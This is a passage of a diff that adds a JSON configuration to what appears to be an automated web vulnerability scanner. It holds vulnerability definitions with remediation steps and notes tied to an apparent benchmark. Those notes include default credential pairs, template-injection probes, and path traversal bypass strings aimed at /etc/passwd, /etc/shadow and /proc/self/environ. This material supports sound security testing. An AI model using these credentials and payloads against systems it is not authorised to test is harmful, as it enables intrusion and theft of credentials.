+      "cwe_id": "CWE-284",
+      "description": "Cloud storage bucket with public read/write access.",
+      "impact": "Data exposure, data tampering, hosting malicious content.",
+      "remediation": "1. Enable S3 Block Public Access\n2. Review bucket policies\n3. Use IAM policies for access\n4. Enable access logging",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "cloud_metadata_exposure": {
+      "title": "Cloud Metadata Exposure",
+      "severity": "critical",
+      "cwe_id": "CWE-918",
+      "description": "Cloud instance metadata service accessible exposing credentials.",
+      "impact": "IAM credential theft, cloud account compromise, lateral movement.",
+      "remediation": "1. Use IMDSv2 (token-required)\n2. Block metadata endpoint in firewall\n3. Implement SSRF protection\n4. Use minimal IAM roles",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "serverless_misconfiguration": {
+      "title": "Serverless Misconfiguration",
+      "severity": "medium",
+      "cwe_id": "CWE-284",
+      "description": "Serverless function with excessive permissions or missing auth.",
+      "impact": "Unauthorized function execution, environment variable exposure, privilege escalation.",
+      "remediation": "1. Apply least privilege IAM roles\n2. Require authentication\n3. Don't expose secrets in env vars\n4. Implement function authorization",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "graphql_introspection": {
+      "title": "GraphQL Introspection Enabled",
+      "severity": "low",
+      "cwe_id": "CWE-200",
+      "description": "GraphQL introspection enabled in production exposing full API schema.",
+      "impact": "Complete API mapping, discovery of sensitive types and mutations.",
+      "remediation": "1. Disable introspection in production\n2. Use persisted queries\n3. Implement field-level authorization\n4. Use query allowlisting",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "graphql_dos": {
+      "title": "GraphQL Denial of Service",
+      "severity": "medium",
+      "cwe_id": "CWE-400",
+      "description": "GraphQL endpoint vulnerable to resource-exhaustion via complex/nested queries.",
+      "impact": "Service unavailability, resource exhaustion, increased infrastructure costs.",
+      "remediation": "1. Implement query depth limits\n2. Add query complexity analysis\n3. Set timeout on queries\n4. Use persisted/allowlisted queries",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "rest_api_versioning": {
+      "title": "Insecure API Version Exposure",
+      "severity": "low",
+      "cwe_id": "CWE-284",
+      "description": "Older API versions with weaker security controls still accessible.",
+      "impact": "Bypass newer security controls via old API versions.",
+      "remediation": "1. Deprecate and remove old API versions\n2. Apply same security to all versions\n3. Monitor old version usage\n4. Set deprecation timelines",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "soap_injection": {
+      "title": "SOAP/XML Web Service Injection",
+      "severity": "high",
+      "cwe_id": "CWE-91",
+      "description": "Injection in SOAP/XML web service parameters manipulating queries.",
+      "impact": "Data extraction, XXE via SOAP, SOAP action spoofing for unauthorized operations.",
+      "remediation": "1. Validate SOAP input\n2. Disable XML external entities\n3. Validate SOAPAction header\n4. Use WS-Security",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "api_rate_limiting": {
+      "title": "Missing API Rate Limiting",
+      "severity": "medium",
+      "cwe_id": "CWE-770",
+      "description": "API endpoints lacking rate limiting allowing unlimited requests.",
+      "impact": "Brute force, scraping, DoS, API abuse at scale.",
+      "remediation": "1. Implement rate limiting per user/IP\n2. Return 429 with Retry-After\n3. Use API gateway throttling\n4. Implement sliding window algorithm",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "excessive_data_exposure": {
+      "title": "Excessive Data Exposure",
+      "severity": "medium",
+      "cwe_id": "CWE-213",
+      "description": "APIs returning more data than the client needs, including sensitive fields.",
+      "impact": "Exposure of sensitive fields (password hashes, tokens, PII) to clients.",
+      "remediation": "1. Use response DTOs/serializers\n2. Implement field-level filtering\n3. Apply least-data principle\n4. Separate admin and user endpoints",
+      "has_tester": true,
+      "false_positive_markers": []
+    }
+  },
+  "category_mappings": {
+    "injection": [
+      "sqli_error",
+      "sqli_union",
+      "sqli_blind",
+      "sqli_time",
+      "command_injection",
+      "ssti",
+      "nosql_injection",
+      "xxe"
+    ],
+    "xss": [
+      "xss_reflected",
+      "xss_stored",
+      "xss_dom"
+    ],
+    "file_access": [
+      "lfi",
+      "rfi",
+      "path_traversal",
+      "file_upload"
+    ],
+    "request_forgery": [
+      "ssrf",
+      "ssrf_cloud",
+      "csrf"
+    ],
+    "auth": [
+      "auth_bypass",
+      "jwt_manipulation",
+      "session_fixation"
+    ],
+    "authorization": [
+      "idor",
+      "bola",
+      "privilege_escalation"
+    ],
+    "client_side": [
+      "cors_misconfig",
+      "clickjacking",
+      "open_redirect"
+    ],
+    "infrastructure": [
+      "security_headers",
+      "ssl_issues",
+      "http_methods"
+    ],
+    "logic": [
+      "race_condition",
+      "business_logic"
+    ]
+  },
+  "xbow_insights": {
+    "default_credentials": {
+      "description": "XBOW: 15 challenges focused on default/weak credentials",
+      "common_creds": [
+        [
+          "admin",
+          "admin"
+        ],
+        [
+          "admin",
+          "password"
+        ],
+        [
+          "admin",
+          "123456"
+        ],
+        [
+          "root",
+          "root"
+        ],
+        [
+          "root",
+          "toor"
+        ],
+        [
+          "test",
+          "test"
+        ],
+        [
+          "user",
+          "user"
+        ],
+        [
+          "admin",
+          ""
+        ],
+        [
+          "admin",
+          "admin123"
+        ],
+        [
+          "administrator",
+          "administrator"
+        ],
+        [
+          "guest",
+          "guest"
+        ],
+        [
+          "operator",
+          "operator"
+        ],
+        [
+          "tomcat",
+          "tomcat"
+        ],
+        [
+          "manager",
+          "manager"
+        ],
+        [
+          "postgres",
+          "postgres"
+        ]
+      ],
+      "targets": [
+        "login pages",
+        "admin panels",
+        "database consoles",
+        "management interfaces"
+      ]
+    },
+    "deserialization": {
+      "description": "XBOW: 4 challenges on insecure deserialization",
+      "frameworks": [
+        "pickle",
+        "yaml",
+        "php_serialize",
+        "java_serialized",
+        "json_dotnet"
+      ],
+      "indicators": [
+        "base64 encoded objects",
+        "serialized data in cookies",
+        "__reduce__",
+        "ObjectInputStream"
+      ]
+    },
+    "business_logic": {
+      "description": "XBOW: 4 challenges on business logic flaws",
+      "patterns": [
+        "type_juggling",
+        "race_condition",
+        "mass_assignment",
+        "parameter_pollution"
+      ],
+      "techniques": [
+        "concurrent requests",
+        "negative values",
+        "type coercion",
+        "hidden parameters"
+      ]
+    },
+    "idor": {
+      "description": "XBOW: 11 challenges on IDOR/authorization bypass",
+      "techniques": [
+        "sequential ID enumeration",
+        "UUID prediction",
+        "parameter tampering",
+        "HTTP method switching"
+      ],
+      "indicators": [
+        "numeric IDs in URLs",
+        "user_id parameters",
+        "object references in API"
+      ]
+    },
+    "privilege_escalation": {
+      "description": "XBOW: 6 challenges on privilege escalation",
+      "techniques": [
+        "role parameter manipulation",
+        "admin flag injection",
+        "JWT claim editing",
+        "path-based auth bypass"
+      ]
+    },
+    "ssti": {
+      "description": "XBOW: 9 challenges on SSTI",
+      "probes": [
+        "{{7*7}}",
+        "${7*7}",
+        "<%= 7*7 %>",
+        "#{7*7}",
+        "*{7*7}",
+        "{{\"\".__class__}}"
+      ],
+      "frameworks": [
+        "Jinja2",
+        "Twig",
+        "Freemarker",
+        "Mako",
+        "Velocity",
+        "Smarty",
+        "Pebble"
+      ]
+    },
+    "path_traversal": {
+      "description": "XBOW: 5 challenges on path traversal/LFI",
+      "bypasses": [
+        "....//....//etc/passwd",
+        "..%2f..%2f",
+        "..%252f",
+        "..\\..\\",
+        "%2e%2e%2f"
+      ],
+      "targets": [
+        "/etc/passwd",
+        "/etc/shadow",
+        "C:\\Windows\\win.ini",
+        "/proc/self/environ"
+      ]
+    },
+    "blind_sqli": {
+      "description": "XBOW: 3 challenges on blind SQL injection",
+      "techniques": [
+        "boolean-based",
+        "time-based",
+        "out-of-band"
+      ],
+      "detection": [
+        "response size diff",
+        "timing diff > 5s",
+        "DNS callback"
+      ]
+    },
+    "verification_methodology": {
+      "description": "XBOW binary verification approach adapted for black-box testing",
+      "principles": [
+        "Every finding must have concrete HTTP evidence",
+        "Health check target before testing",
+        "Cache and reuse baseline responses",
+        "Multi-signal confirmation (2+ signals = confirmed)",
+        "Never trust AI claims without HTTP evidence",
+        "Reject speculative language in evidence"
+      ]
+    }
+  }
+}
\ No newline at end of file